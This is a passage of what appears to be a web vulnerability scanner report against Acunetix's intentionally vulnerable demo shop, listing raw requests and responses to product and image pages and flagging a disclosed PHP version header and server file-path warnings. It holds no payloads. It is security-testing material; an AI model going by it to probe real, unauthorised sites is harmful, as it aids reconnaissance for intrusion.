href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=6 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=6 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=2 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:17 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6454 |
Response Body - size: 6,454 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Thing</h2><div class='story'><p><a href='showimage.php?file=./pictures/6.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/6.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><h3>Long description</h3><p><p> This picture is an 99 cm x 200 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $10000</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='10000'><input type='hidden' name='addcart' value='6'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=7 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=7 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:11 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5734 |
Response Body - size: 5,734 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Trees</h2><div class='story'><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>bla bla bla</p><h3>Long description</h3><p>bla bla bla long</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p>the price of this item is: $15000</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='15000'><input type='hidden' name='addcart' value='7'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/showimage.php?file='%20+%20pict.item(0).firstChild.nodeValue%20+%20' |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 334 bytes. |
GET http://testphp.vulnweb.com/showimage.php?file='%20+%20pict.item(0).firstChild.nodeValue%20+%20' HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/AJAX/index.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 207 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:59 GMT Content-Type: image/jpeg Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 261 |
Response Body - size: 261 bytes. |
Warning: fopen(' pict.item(0).firstChild.nodeValue '): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 13
Warning: fpassthru() expects parameter 1 to be resource, boolean given in /hj/var/www/showimage.php on line 19 |
URL | http://testphp.vulnweb.com/showimage.php?file=./pictures/1.jpg |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 309 bytes. |
GET http://testphp.vulnweb.com/showimage.php?file=./pictures/1.jpg HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 209 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:07 GMT Content-Type: image/jpeg Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 12426 |
Response Body - size: 12,426 bytes. |
ÿØÿà JFIF ÿÛ C
%# , #&')*)-0-(0%()(ÿÛ C (((((((((((((((((((((((((((((((((((((((((((((((((((ÿÂ È@" |